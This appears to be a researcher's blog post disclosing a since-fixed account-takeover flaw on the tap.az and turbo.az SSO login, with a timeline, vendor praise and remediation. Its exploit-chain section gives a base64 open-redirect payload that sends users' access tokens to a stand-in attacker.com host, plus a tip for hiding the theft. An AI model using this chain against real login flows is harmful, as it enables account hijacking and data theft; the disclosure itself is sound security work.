You like that, huh?

Would you like some help on this one?
  1. Home
  3. Blog
  5. Open Redirect To Ato

CVSS 9.6 Account Takeover in Azerbaijan's Most Visited Platforms

1000 rvfet
Hero image for CVSS 9.6 Account Takeover in Azerbaijan's Most Visited Platforms
9.6 Critical

CVSS Analysis

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
Vector
Network
Complexity
Low
Privileges
None
Scope
Changed
Confidentiality
High
Integrity
High

Executive Summary

In September 2025, I identified a critical vulnerability affecting Digital Classifieds Azerbaijan MMC’s tap.az and turbo.az platforms. The flaw existed within the central authentication infrastructure for their flagship platforms.

By chaining an Open Redirect with an insecure token transmission mechanism, I demonstrated how an attacker could steal access_tokens. This allowed for complete account takeover (ATO) without requiring user credentials or complex interaction.

Technical Breakdown

The vulnerability resided in the Single Sign-On (SSO) subdomains: hello.tap.az and hello.turbo.az. These endpoints handle user sessions and generally are pretty secure. However, they featured an insecure back_to/return_to parameter that accepted Base64-encoded URLs for redirection after login. After successful authentication, the server would redirect users to the specified URL, appending the access_token in the query string.

The Root Cause

Two distinct misconfigurations created the exploit chain:

  1. Weak Validation: The back_to/return_to parameters accepted Base64-encoded URLs but failed to validate the decoded origin against a strict allow-list or relative paths. This allowed attackers to specify arbitrary external URLs.
  2. Token Leakage: Upon redirecting the user, the server appended the sensitive jwt token called access_token directly to the destination URL’s query string rather than using secure headers or cookies.

The Exploit Chain

  1. Payload: Attacker encodes a malicious destination: base64("https://attacker.com/log").
  2. Delivery: Attacker abuses the original login flow: https://hello.tap.az/login?back_to=[PAYLOAD].
  3. Execution: Upon user login, the server redirects to the attacker’s URL with the token: https://attacker.com/log?access_token=eyJhbGci....
  4. Exfiltration: The browser navigates to https://attacker.com/log?access_token=eyJhbGci..., leaking the session key to the attacker’s logs.
  5. Masquerade: Attacker can be a little clever and redirect user back to the original site after token capture to avoid suspicion. If attacker uses 30X redirects, even the browser history remains clean.

Proof of Concept

I created a non-destructive POC using Beeceptor to simulate how an attacker could abuse the vulnerability to capture tokens.

Impact Analysis

This vulnerability had a demonstrated critical impact:

  • Scale: Affects millions of monthly active users across the country’s largest general and automotive marketplaces, totaling over 5 million accounts.
  • Data Privacy: Attackers could access full PII, unencrypted private messages, and contact details.
  • Financial Risk: Ability to manipulate active listings, delete ads, or post fraudulent content from trusted accounts.

Disclosure Timeline & Vendor Response

I followed a strict responsible disclosure process. In the Azerbaijani tech ecosystem, security researchers often face legal threats or silence rather than cooperation. Digital Classifieds Azerbaijan MMC proved to be an exceptional outlier, setting a gold standard for how local companies should handle security reports.

Despite not having a public Bug Bounty program at the time, their response was immediate and professional once I established contact with the right stakeholders.

  • Sep 18, 2025: Vulnerability identified.
  • Sep 19, 2025: POC created; impact assessment finalized.
  • Sep 25, 2025: Escalated to leadership via LinkedIn.
  • Oct 10, 2025: Full technical report submitted to the Security Team.
  • Oct 13, 2025: Triaged & Fixed. The team confirmed the patch and voluntarily awarded a $XXXX bounty.
  • Oct 15, 2025: Bounty Increased to $XXXX. After internal review, the company voluntarily increased the bounty amount by roughly 65% to better reflect the criticality of the finding.

A Benchmark for the Azerbaijani Tech Industry

I want to specifically highlight the professionalism of Mammad Mammadov and the engineering leadership at Digital Classifieds.

It is unfortunately rare for companies in the region to acknowledge external security findings without hostility. Digital Classifieds not only accepted the report but treated it as a collaborative opportunity to improve their security posture. They:

  1. Prioritized Remediation: Fixed the issue immediately to protect their 5M+ users.
  2. Rewarded Research: Offered a bounty without a pre-existing policy.
  3. Valued Impact: Voluntarily increased the reward after understanding the full severity (ATO), rather than trying to downplay the risk.

This behavior is a bright example for the rest of the Azerbaijani market. Security through obscurity is not a strategy; collaboration with the research community is. Digital Classifieds has shown that they value user data integrity over ego.

Remediation

The engineering team at Digital Classifieds implemented a robust fix by:

  1. Enforcing server-side mapping for redirect targets (ID-based instead of URL-based).
  2. Restricting back_to parameters to internal domains only.
  3. Moving session tokens from URL parameters to HttpOnly / SameSite cookies.